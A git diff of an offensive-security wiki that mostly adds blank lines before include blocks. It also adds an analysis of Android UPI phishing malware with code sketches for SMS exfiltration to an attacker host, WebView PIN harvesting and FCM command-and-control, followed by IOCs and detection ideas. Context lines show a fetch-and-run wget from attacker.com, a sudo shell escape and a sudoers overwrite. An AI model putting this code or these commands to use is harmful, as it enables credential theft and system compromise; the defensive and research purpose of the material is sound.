src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md
View File

@ -195,6 +195,7 @@ As was seen before there are several places where the file is still saved after
Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible.
{{#ref}}
file-data-carving-recovery-tools.md
{{#endref}}
@ -207,6 +208,7 @@ Note that this technique **doesn't work to retrieve fragmented files**. If a fil
There are several tools that you can use for file Carving indicating the file types you want to search for
{{#ref}}
file-data-carving-recovery-tools.md
{{#endref}}
@ -216,6 +218,7 @@ file-data-carving-recovery-tools.md
Data Stream Carving is similar to File Carving but **instead of looking for complete files, it looks for interesting fragments** of information.\
For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs.
{{#ref}}
file-data-carving-recovery-tools.md
{{#endref}}
@ -235,4 +238,3 @@ You may notice that even performing that action there might be **other parts whe
{{#include ../../../banners/hacktricks-training.md}}

7
src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md
View File

@ -23,6 +23,7 @@ The following tools are useful to extract statistics, files, etc.
You can find some Wireshark tricks in:
{{#ref}}
wireshark-tricks.md
{{#endref}}
@ -92,6 +93,7 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.
Using common carving techniques can be useful to extract files and information from the pcap:
{{#ref}}
../partitions-file-systems-carving/file-data-carving-recovery-tools.md
{{#endref}}
@ -133,6 +135,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
Check if you can find any fingerprint of a known malware:
{{#ref}}
../malware-analysis.md
{{#endref}}
@ -216,14 +219,17 @@ rita show-exploded-dns -H --limit 10 zeek_logs
## Other pcap analysis tricks
{{#ref}}
dnscat-exfiltration.md
{{#endref}}
{{#ref}}
wifi-pcap-analysis.md
{{#endref}}
{{#ref}}
usb-keystrokes.md
{{#endref}}
@ -233,4 +239,3 @@ usb-keystrokes.md
{{#include ../../../banners/hacktricks-training.md}}

10
src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md
View File

@ -4,38 +4,47 @@
Here you can find interesting tricks for specific file-types and/or software:
{{#ref}}
.pyc.md
{{#endref}}
{{#ref}}
browser-artifacts.md
{{#endref}}
{{#ref}}
desofuscation-vbs-cscript.exe.md
{{#endref}}
{{#ref}}
local-cloud-storage.md
{{#endref}}
{{#ref}}
office-file-analysis.md
{{#endref}}
{{#ref}}
pdf-file-analysis.md
{{#endref}}
{{#ref}}
png-tricks.md
{{#endref}}
{{#ref}}
video-and-audio-file-analysis.md
{{#endref}}
{{#ref}}
zips-tricks.md
{{#endref}}
@ -43,4 +52,3 @@ zips-tricks.md
{{#include ../../../banners/hacktricks-training.md}}

2
src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
View File

@ -266,6 +266,7 @@ In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login,
### Interesting entries in the Windows Registry
{{#ref}}
interesting-windows-registry-keys.md
{{#endref}}
@ -502,4 +503,3 @@ Security EventID 1102 signals the deletion of logs, a critical event for forensi
{{#include ../../../banners/hacktricks-training.md}}

5
src/generic-methodologies-and-resources/external-recon-methodology/README.md
View File

@ -479,10 +479,12 @@ echo www | subzuf facebook.com
Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer:
{{#ref}}
https://trickest.com/blog/full-subdomain-discovery-using-workflow/
{{#endref}}
{{#ref}}
https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/
{{#endref}}
@ -641,6 +643,7 @@ You can use the **tool** [**Leakos**](https://github.com/carlospolop/Leakos) to
Check also this **page** for potential **github dorks** you could also search for in the organization you are attacking:
{{#ref}}
github-leaked-secrets.md
{{#endref}}
@ -666,6 +669,7 @@ If you found that the company has **open-source code** you can **analyse** it an
**Depending on the language** there are different **tools** you can use:
{{#ref}}
../../network-services-pentesting/pentesting-web/code-review-tools.md
{{#endref}}
@ -710,4 +714,3 @@ There are several tools out there that will perform part of the proposed actions
- All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
{{#include ../../banners/hacktricks-training.md}}

8
src/generic-methodologies-and-resources/pentesting-network/README.md
View File

@ -64,6 +64,7 @@ nmap -T4 -sY -n --open -Pn <IP/range>
Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:
{{#ref}}
../pentesting-wifi/
{{#endref}}
@ -192,12 +193,14 @@ nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>
### IDS and IPS evasion
{{#ref}}
ids-evasion.md
{{#endref}}
### **More nmap options**
{{#ref}}
nmap-summary-esp.md
{{#endref}}
@ -388,6 +391,7 @@ sendp(packet)
If you have **access to a switch that you are directly connected to**, you have the ability to **bypass VLAN segmentation** within the network. Simply **switch the port to trunk mode** (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case.
{{#ref}}
lateral-vlan-segmentation-bypass.md
{{#endref}}
@ -611,6 +615,7 @@ eapmd5pass r pcap.dump w /usr/share/wordlist/sqlmap.txt
**Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.**
{{#ref}}
glbp-and-hsrp-attacks.md
{{#endref}}
@ -632,6 +637,7 @@ To attack a EIGRP system requires **establishing a neighbourhood with a legitima
[**FRRouting**](https://frrouting.org/) allows you to implement **a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols.** All you need to do is deploy it on your attackers system and you can actually pretend to be a legitimate router in the routing domain.
{{#ref}}
eigrp-attacks.md
{{#endref}}
@ -893,6 +899,7 @@ Bettercap broadcast WSD packets searching for services (UDP Port 3702).
### Telecom / Mobile-Core (GTP) Exploitation
{{#ref}}
telecom-network-exploitation.md
{{#endref}}
@ -909,4 +916,3 @@ telecom-network-exploitation.md
{{#include ../../banners/hacktricks-training.md}}

2
src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
View File

@ -119,6 +119,7 @@ These tools and techniques form a comprehensive set for conducting NTLM Relay at
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
{{#ref}}
../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
{{#endref}}
@ -245,4 +246,3 @@ You now own **NT AUTHORITY\SYSTEM**.
{{#include ../../banners/hacktricks-training.md}}

2
src/generic-methodologies-and-resources/pentesting-wifi/README.md
View File

@ -23,6 +23,7 @@ iwlist wlan0 scan #Scan available wifis
### Hijacker & NexMon (Android internal Wi-Fi)
{{#ref}}
enable-nexmon-monitor-and-injection-on-android.md
{{#endref}}
@ -796,4 +797,3 @@ TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github
{{#include ../../banners/hacktricks-training.md}}

7
src/generic-methodologies-and-resources/phishing-methodology/README.md
View File

@ -26,6 +26,7 @@
- **New TLD**: Same domain using a **new TLD** (e.g., zelster.org)
- **Homoglyph**: It **replaces** a letter in the domain name with **letters that look similar** (e.g., zelfser.com).
{{#ref}}
homograph-attacks.md
{{#endref}}
@ -414,6 +415,7 @@ Once everything is ready, just launch the campaign!
If for any reason you want to clone the website check the following page:
{{#ref}}
clone-a-website.md
{{#endref}}
@ -423,6 +425,7 @@ clone-a-website.md
In some phishing assessments (mainly for Red Teams) you will want to also **send files containing some kind of backdoor** (maybe a C2 or maybe just something that will trigger an authentication).\
Check out the following page for some examples:
{{#ref}}
phishing-documents.md
{{#endref}}
@ -452,6 +455,7 @@ One easy way to check if you domain appears in any blacklist is to use [https://
However, there are other ways to know if the victim is **actively looking for suspicions phishing activity in the wild** as explained in:
{{#ref}}
detecting-phising.md
{{#endref}}
@ -557,12 +561,14 @@ Monitor for AzureAD/AWS/Okta events where **`deleteMFA` + `addMFA`** occur **wit
Attackers can silently copy malicious commands into the victims clipboard from a compromised or typosquatted web page and then trick the user to paste them inside **Win + R**, **Win + X** or a terminal window, executing arbitrary code without any download or attachment.
{{#ref}}
clipboard-hijacking.md
{{#endref}}
## Mobile Phishing & Malicious App Distribution (Android & iOS)
{{#ref}}
mobile-phishing-malicious-apps.md
{{#endref}}
@ -577,4 +583,3 @@ mobile-phishing-malicious-apps.md
{{#include ../../banners/hacktricks-training.md}}

5
src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md
View File

@ -84,7 +84,8 @@ Blue-teams can combine clipboard, process-creation and registry telemetry to pin
## Related Tricks
* **Discord Invite Hijacking** often abuses the same ClickFix approach after luring users into a malicious server:
{{#ref}}
{{#ref}}
discord-invite-hijacking.md
{{#endref}}
@ -93,4 +94,4 @@ Blue-teams can combine clipboard, process-creation and registry telemetry to pin
- [Fix the Click: Preventing the ClickFix Attack Vector](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/)
- [Pastejacking PoC GitHub](https://github.com/dxa4481/Pastejacking)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

136
src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
View File

@ -90,9 +90,143 @@ Java.perform(function() {
LubanCompress 1.1.8 # "Luban" string inside classes.dex
```
---
## Android WebView Payment Phishing (UPI) Dropper + FCM C2 Pattern
This pattern has been observed in campaigns abusing government-benefit themes to steal Indian UPI credentials and OTPs. Operators chain reputable platforms for delivery and resilience.
### Delivery chain across trusted platforms
- YouTube video lure → description contains a short link
- Shortlink → GitHub Pages phishing site imitating the legit portal
- Same GitHub repo hosts an APK with a fake “Google Play” badge linking directly to the file
- Dynamic phishing pages live on Replit; remote command channel uses Firebase Cloud Messaging (FCM)
### Dropper with embedded payload and offline install
- First APK is an installer (dropper) that ships the real malware at `assets/app.apk` and prompts the user to disable WiFi/mobile data to blunt cloud detection.
- The embedded payload installs under an innocuous label (e.g., “Secure Update”). After install, both the installer and the payload are present as separate apps.
Static triage tip (grep for embedded payloads):
```bash
unzip -l sample.apk | grep -i "assets/app.apk"
# Or:
zipgrep -i "classes|.apk" sample.apk | head
```
### Dynamic endpoint discovery via shortlink
- Malware fetches a plain-text, comma-separated list of live endpoints from a shortlink; simple string transforms produce the final phishing page path.
Example (sanitised):
```
GET https://rebrand.ly/dclinkto2
Response: https://sqcepo.replit.app/gate.html,https://sqcepo.replit.app/addsm.php
Transform: "gate.html" → "gate.htm" (loaded in WebView)
UPI credential POST: https://sqcepo.replit.app/addup.php
SMS upload: https://sqcepo.replit.app/addsm.php
```
Pseudo-code:
```java
String csv = httpGet(shortlink);
String[] parts = csv.split(",");
String upiPage = parts[0].replace("gate.html", "gate.htm");
String smsPost = parts[1];
String credsPost = upiPage.replace("gate.htm", "addup.php");
```
### WebView-based UPI credential harvesting
- The “Make payment of ₹1 / UPILite” step loads an attacker HTML form from the dynamic endpoint inside a WebView and captures sensitive fields (phone, bank, UPI PIN) which are `POST`ed to `addup.php`.
Minimal loader:
```java
WebView wv = findViewById(R.id.web);
wv.getSettings().setJavaScriptEnabled(true);
wv.loadUrl(upiPage); // ex: https://<replit-app>/gate.htm
```
### Self-propagation and SMS/OTP interception
- Aggressive permissions are requested on first run:
```xml
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
```
- Contacts are looped to mass-send smishing SMS from the victims device.
- Incoming SMS are intercepted by a broadcast receiver and uploaded with metadata (sender, body, SIM slot, per-device random ID) to `/addsm.php`.
Receiver sketch:
```java
public void onReceive(Context c, Intent i){
SmsMessage[] msgs = Telephony.Sms.Intents.getMessagesFromIntent(i);
for (SmsMessage m: msgs){
postForm(urlAddSms, new FormBody.Builder()
.add("senderNum", m.getOriginatingAddress())
.add("Message", m.getMessageBody())
.add("Slot", String.valueOf(getSimSlot(i)))
.add("Device rand", getOrMakeDeviceRand(c))
.build());
}
}
```
### Firebase Cloud Messaging (FCM) as resilient C2
- The payload registers to FCM; push messages carry a `_type` field used as a switch to trigger actions (e.g., update phishing text templates, toggle behaviours).
Example FCM payload:
```json
{
"to": "<device_fcm_token>",
"data": {
"_type": "update_texts",
"template": "New subsidy message..."
}
}
```
Handler sketch:
```java
@Override
public void onMessageReceived(RemoteMessage msg){
String t = msg.getData().get("_type");
switch (t){
case "update_texts": applyTemplate(msg.getData().get("template")); break;
case "smish": sendSmishToContacts(); break;
// ... more remote actions
}
}
```
### Hunting patterns and IOCs
- APK contains secondary payload at `assets/app.apk`
- WebView loads payment from `gate.htm` and exfiltrates to `/addup.php`
- SMS exfiltration to `/addsm.php`
- Shortlink-driven config fetch (e.g., `rebrand.ly/*`) returning CSV endpoints
- Apps labelled as generic “Update/Secure Update”
- FCM `data` messages with a `_type` discriminator in untrusted apps
### Detection & defence ideas
- Flag apps that instruct users to disable network during install and then side-load a second APK from `assets/`.
- Alert on the permission tuple: `READ_CONTACTS` + `READ_SMS` + `SEND_SMS` + WebView-based payment flows.
- Egress monitoring for `POST /addup.php|/addsm.php` on non-corporate hosts; block known infrastructure.
- Mobile EDR rules: untrusted app registering for FCM and branching on a `_type` field.
---
## References
- [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign)
- [Luban Android image compression library](https://github.com/Curzibn/Luban)
- [Android Malware Promises Energy Subsidy to Steal Financial Data (McAfee Labs)](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-promises-energy-subsidy-to-steal-financial-data/)
- [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

3
src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
View File

@ -150,10 +150,12 @@ There are several ways to **force NTLM authentication "remotely"**, for example,
**Check these ideas and more in the following pages:**
{{#ref}}
../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
{{#endref}}
{{#ref}}
../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md
{{#endref}}
@ -168,4 +170,3 @@ Don't forget that you cannot only steal the hash or the authentication but also
{{#include ../../banners/hacktricks-training.md}}

3
src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
View File

@ -708,6 +708,7 @@ if __name__ == "__main__":
You can check the output of this script on this page:
{{#ref}}
https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/python/bypass-python-sandboxes/broken-reference/README.md
{{#endref}}
@ -765,6 +766,7 @@ class HAL9000(object):
> [!CAUTION]
> Check also the following page for gadgets that will r**ead sensitive information from Python internal objects**:
{{#ref}}
../python-internal-read-gadgets.md
{{#endref}}
@ -1114,6 +1116,7 @@ Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) o
**Check out this tutorial**:
{{#ref}}
../../basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
{{#endref}}

2
src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md
View File

@ -259,6 +259,7 @@ Use this payload to **change `app.secret_key`** (the name in your app might be d
Check also the following page for more read only gadgets:
{{#ref}}
python-internal-read-gadgets.md
{{#endref}}
@ -270,4 +271,3 @@ python-internal-read-gadgets.md
{{#include ../../banners/hacktricks-training.md}}

3
src/hardware-physical-access/firmware-analysis/README.md
View File

@ -6,6 +6,7 @@
### Related resources
{{#ref}}
synology-encrypted-archive-decryption.md
{{#endref}}
@ -61,6 +62,7 @@ If you don't find much with those tools check the **entropy** of the image with
Moreover, you can use these tools to extract **files embedded inside the firmware**:
{{#ref}}
../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
{{#endref}}
@ -309,4 +311,3 @@ To practice discovering vulnerabilities in firmware, use the following vulnerabl
{{#include ../../banners/hacktricks-training.md}}

3
src/linux-hardening/bypass-bash-restrictions/README.md
View File

@ -330,12 +330,14 @@ ln /f*
If you are inside a filesystem with the **read-only and noexec protections** or even in a distroless container, there are still ways to **execute arbitrary binaries, even a shell!:**
{{#ref}}
bypass-fs-protections-read-only-no-exec-distroless/
{{#endref}}
## Chroot & other Jails Bypass
{{#ref}}
../privilege-escalation/escaping-from-limited-bash.md
{{#endref}}
@ -374,4 +376,3 @@ Practical use cases:
{{#include ../../banners/hacktricks-training.md}}

2
src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
View File

@ -69,6 +69,7 @@ wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo
For more information about this technique check the Github or:
{{#ref}}
ddexec.md
{{#endref}}
@ -114,4 +115,3 @@ You can find **examples** on how to **exploit some RCE vulnerabilities** to get
{{#include ../../../banners/hacktricks-training.md}}

2
src/linux-hardening/freeipa-pentesting.md
View File

@ -43,6 +43,7 @@ Keytab files, containing Kerberos principals and encrypted keys, are critical fo
You can find more information about how to use tickets in linux in the following link:
{{#ref}}
privilege-escalation/linux-active-directory.md
{{#endref}}
@ -198,4 +199,3 @@ You can check a detailed explaination in [https://posts.specterops.io/attacking-
{{#include ../banners/hacktricks-training.md}}

2
src/linux-hardening/linux-post-exploitation/README.md
View File

@ -6,6 +6,7 @@
Let's configure a PAM module to log each password each user uses to login. If you don't know what is PAM check:
{{#ref}}
pam-pluggable-authentication-modules.md
{{#endref}}
@ -55,4 +56,3 @@ The Pluggable Authentication Module (PAM) is a system used under Linux for user
{{#include ../../banners/hacktricks-training.md}}

18
src/linux-hardening/privilege-escalation/README.md
View File

@ -159,6 +159,7 @@ cat /proc/sys/kernel/randomize_va_space 2>/dev/null
If you are inside a docker container you can try to escape from it:
{{#ref}}
docker-security/
{{#endref}}
@ -410,6 +411,7 @@ rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh mys
Read the following page for more wildcard exploitation tricks:
{{#ref}}
wildcards-spare-tricks.md
{{#endref}}
@ -563,6 +565,7 @@ socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of
**Exploitation example:**
{{#ref}}
socket-command-injection.md
{{#endref}}
@ -632,6 +635,7 @@ Note that if you have write permissions over the docker socket because you are *
Check **more ways to break out from docker or abuse it to escalate privileges** in:
{{#ref}}
docker-security/
{{#endref}}
@ -640,6 +644,7 @@ docker-security/
If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**:
{{#ref}}
containerd-ctr-privilege-escalation.md
{{#endref}}
@ -648,6 +653,7 @@ containerd-ctr-privilege-escalation.md
If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**:
{{#ref}}
runc-privilege-escalation.md
{{#endref}}
@ -675,6 +681,7 @@ Policies without a specified user or group apply universally, while "default" co
**Learn how to enumerate and exploit a D-Bus communication here:**
{{#ref}}
d-bus-enumeration-and-command-injection-privilege-escalation.md
{{#endref}}
@ -762,6 +769,7 @@ Some Linux versions were affected by a bug that allows users with **UID > INT_MA
Check if you are a **member of some group** that could grant you root privileges:
{{#ref}}
interesting-groups-linux-pe/
{{#endref}}
@ -1049,10 +1057,12 @@ The project collects legitimate functions of Unix binaries that can be abused to
> strace -o /dev/null /bin/sh\
> sudo awk 'BEGIN {system("/bin/sh")}'
{{#ref}}
https://gtfobins.github.io/
{{#endref}}
{{#ref}}
https://gtfoargs.github.io/
{{#endref}}
@ -1175,6 +1185,7 @@ That means that the configuration files from `/etc/ld.so.conf.d/*.conf` will be
If for some reason **a user has write permissions** on any of the paths indicated: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, any file inside `/etc/ld.so.conf.d/` or any folder within the config file inside `/etc/ld.so.conf.d/*.conf` he may be able to escalate privileges.\
Take a look at **how to exploit this misconfiguration** in the following page:
{{#ref}}
ld.so.conf-example.md
{{#endref}}
@ -1223,6 +1234,7 @@ int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp
Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation.\
Read the following page to **learn more about capabilities and how to abuse them**:
{{#ref}}
linux-capabilities.md
{{#endref}}
@ -1353,6 +1365,7 @@ The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding wit
If you find that Forward Agent is configured in an environment read the following page as **you may be able to abuse it to escalate privileges**:
{{#ref}}
ssh-forward-agent-exploitation.md
{{#endref}}
@ -1598,18 +1611,21 @@ On the other hand, `/etc/init` is associated with **Upstart**, a newer **service
### NFS Privilege escalation
{{#ref}}
nfs-no_root_squash-misconfiguration-pe.md
{{#endref}}
### Escaping from restricted Shells
{{#ref}}
escaping-from-limited-bash.md
{{#endref}}
### Cisco - vmanage
{{#ref}}
cisco-vmanage.md
{{#endref}}
@ -1663,9 +1679,9 @@ cisco-vmanage.md
Android rooting frameworks commonly hook a syscall to expose privileged kernel functionality to a userspace manager. Weak manager authentication (e.g., signature checks based on FD-order or poor password schemes) can enable a local app to impersonate the manager and escalate to root on already-rooted devices. Learn more and exploitation details here:
{{#ref}}
android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

3
src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md
View File

@ -6,6 +6,7 @@
Go to the following link to learn **what is containerd** and `ctr`:
{{#ref}}
../../network-services-pentesting/2375-pentesting-docker.md
{{#endref}}
@ -45,6 +46,7 @@ You can run a privileged container as:
Then you can use some of the techniques mentioned in the following page to **escape from it abusing privileged capabilities**:
{{#ref}}
docker-security/
{{#endref}}
@ -52,4 +54,3 @@ docker-security/
{{#include ../../banners/hacktricks-training.md}}

13
src/linux-hardening/privilege-escalation/docker-security/README.md
View File

@ -155,6 +155,7 @@ Docker makes use of the following Linux kernel Namespaces to achieve Container i
For **more information about the namespaces** check the following page:
{{#ref}}
namespaces/
{{#endref}}
@ -178,6 +179,7 @@ ls -l /proc/<PID>/ns #Get the Group and the namespaces (some may be uniq to the
For more information check:
{{#ref}}
cgroups.md
{{#endref}}
@ -188,6 +190,7 @@ Capabilities allow **finer control for the capabilities that can be allowed** fo
When a docker container is run, the **process drops sensitive capabilities that the proccess could use to escape from the isolation**. This try to assure that the proccess won't be able to perform sensitive actions and escape:
{{#ref}}
../linux-capabilities.md
{{#endref}}
@ -196,6 +199,7 @@ When a docker container is run, the **process drops sensitive capabilities that
This is a security feature that allows Docker to **limit the syscalls** that can be used inside the container:
{{#ref}}
seccomp.md
{{#endref}}
@ -204,6 +208,7 @@ seccomp.md
**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**.:
{{#ref}}
apparmor.md
{{#endref}}
@ -218,6 +223,7 @@ apparmor.md
This mechanism ensures that even if a process within a container is compromised, it's confined to interacting only with objects that have the corresponding labels, significantly limiting the potential damage from such compromises.
{{#ref}}
../selinux.md
{{#endref}}
@ -231,6 +237,7 @@ In Docker, an authorization plugin plays a crucial role in security by deciding
These contexts help ensure that only legitimate requests from authenticated users are processed, enhancing the security of Docker operations.
{{#ref}}
authz-and-authn-docker-access-authorization-plugin.md
{{#endref}}
@ -261,6 +268,7 @@ nc -lvp 4444 >/dev/null & while true; do cat /dev/urandom | nc <target IP> 4444;
In the following page you can learn **what does the `--privileged` flag imply**:
{{#ref}}
docker-privileged.md
{{#endref}}
@ -341,6 +349,7 @@ In Kubernetes environments, secrets are natively supported and can be further ma
**gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers.
{{#ref}}
https://github.com/google/gvisor
{{#endref}}
@ -349,6 +358,7 @@ https://github.com/google/gvisor
**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense.
{{#ref}}
https://katacontainers.io/
{{#endref}}
@ -374,6 +384,7 @@ https://katacontainers.io/
If you are **inside a docker container** or you have access to a user in the **docker group**, you could try to **escape and escalate privileges**:
{{#ref}}
docker-breakout-privilege-escalation/
{{#endref}}
@ -382,6 +393,7 @@ docker-breakout-privilege-escalation/
If you have access to the docker socket or have access to a user in the **docker group but your actions are being limited by a docker auth plugin**, check if you can **bypass it:**
{{#ref}}
authz-and-authn-docker-access-authorization-plugin.md
{{#endref}}
@ -408,4 +420,3 @@ authz-and-authn-docker-access-authorization-plugin.md
- [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/)
{{#include ../../../banners/hacktricks-training.md}}

6
src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
View File

@ -64,6 +64,7 @@ capsh --print
In the following page you can **learn more about linux capabilities** and how to abuse them to escape/escalate privileges:
{{#ref}}
../../linux-capabilities.md
{{#endref}}
@ -84,6 +85,7 @@ A privileged container can be created with the flag `--privileged` or disabling
The `--privileged` flag significantly lowers container security, offering **unrestricted device access** and bypassing **several protections**. For a detailed breakdown, refer to the documentation on `--privileged`'s full impacts.
{{#ref}}
../docker-privileged.md
{{#endref}}
@ -230,6 +232,7 @@ cat /output
Find an **explanation of the technique** in:
{{#ref}}
docker-release_agent-cgroups-escape.md
{{#endref}}
@ -238,6 +241,7 @@ docker-release_agent-cgroups-escape.md
In the previous exploits the **absolute path of the container inside the hosts filesystem is disclosed**. However, this isnt always the case. In cases where you **dont know the absolute path of the container inside the host** you can use this technique:
{{#ref}}
release_agent-exploit-relative-paths-to-pids.md
{{#endref}}
@ -345,6 +349,7 @@ The abuse of these files may allow that:
However, you can find **other sensitive files** to check for in this page:
{{#ref}}
sensitive-mounts.md
{{#endref}}
@ -640,4 +645,3 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
{{#include ../../../../banners/hacktricks-training.md}}

5
src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md
View File

@ -98,6 +98,7 @@ mount | grep /proc.*tmpfs
Container engines launch the containers with a **limited number of capabilities** to control what goes on inside of the container by default. **Privileged** ones have **all** the **capabilities** accesible. To learn about capabilities read:
{{#ref}}
../linux-capabilities.md
{{#endref}}
@ -136,6 +137,7 @@ You can manipulate the capabilities available to a container without running in
**Seccomp** is useful to **limit** the **syscalls** a container can call. A default seccomp profile is enabled by default when running docker containers, but in privileged mode it is disabled. Learn more about Seccomp here:
{{#ref}}
seccomp.md
{{#endref}}
@ -175,6 +177,7 @@ Also, note that when Docker (or other CRIs) are used in a **Kubernetes** cluster
**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**. When you run with the `--privileged` flag, this protection is disabled.
{{#ref}}
apparmor.md
{{#endref}}
@ -188,6 +191,7 @@ apparmor.md
Running a container with the `--privileged` flag disables **SELinux labels**, causing it to inherit the label of the container engine, typically `unconfined`, granting full access similar to the container engine. In rootless mode, it uses `container_runtime_t`, while in root mode, `spc_t` is applied.
{{#ref}}
../selinux.md
{{#endref}}
@ -242,4 +246,3 @@ PID USER TIME COMMAND
{{#include ../../../banners/hacktricks-training.md}}

8
src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md
View File

@ -4,42 +4,49 @@
### **PID namespace**
{{#ref}}
pid-namespace.md
{{#endref}}
### **Mount namespace**
{{#ref}}
mount-namespace.md
{{#endref}}
### **Network namespace**
{{#ref}}
network-namespace.md
{{#endref}}
### **IPC Namespace**
{{#ref}}
ipc-namespace.md
{{#endref}}
### **UTS namespace**
{{#ref}}
uts-namespace.md
{{#endref}}
### Time Namespace
{{#ref}}
time-namespace.md
{{#endref}}
### User namespace
{{#ref}}
user-namespace.md
{{#endref}}
@ -47,4 +54,3 @@ user-namespace.md
{{#include ../../../../banners/hacktricks-training.md}}

2
src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md
View File

@ -16,6 +16,7 @@ While cgroup namespaces are not a separate namespace type like the others we dis
For more information about CGroups check:
{{#ref}}
../cgroups.md
{{#endref}}
@ -92,4 +93,3 @@ Also, you can only **enter in another process namespace if you are root**. And y
{{#include ../../../../banners/hacktricks-training.md}}

3
src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md
View File

@ -231,6 +231,7 @@ wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
[https://gtfobins.github.io](https://gtfobins.github.io/**](https/gtfobins.github.io)\
**It could also be interesting the page:**
{{#ref}}
../bypass-bash-restrictions/
{{#endref}}
@ -239,6 +240,7 @@ wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
Tricks about escaping from python jails in the following page:
{{#ref}}
../../generic-methodologies-and-resources/python/bypass-python-sandboxes/
{{#endref}}
@ -292,4 +294,3 @@ debug.debug()
{{#include ../../banners/hacktricks-training.md}}

5
src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
View File

@ -235,22 +235,26 @@ docker run --rm -it --pid=host --net=host --privileged -v /:/mnt <imagename> chr
Finally, if you don't like any of the suggestions of before, or they aren't working for some reason (docker api firewall?) you could always try to **run a privileged container and escape from it** as explained here:
{{#ref}}
../docker-security/
{{#endref}}
If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../index.html#writable-docker-socket)**.**
{{#ref}}
https://github.com/KrustyHack/docker-privilege-escalation
{{#endref}}
{{#ref}}
https://fosterelli.co/privilege-escalation-via-docker.html
{{#endref}}
## lxc/lxd Group
{{#ref}}
./
{{#endref}}
@ -266,4 +270,3 @@ Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey*
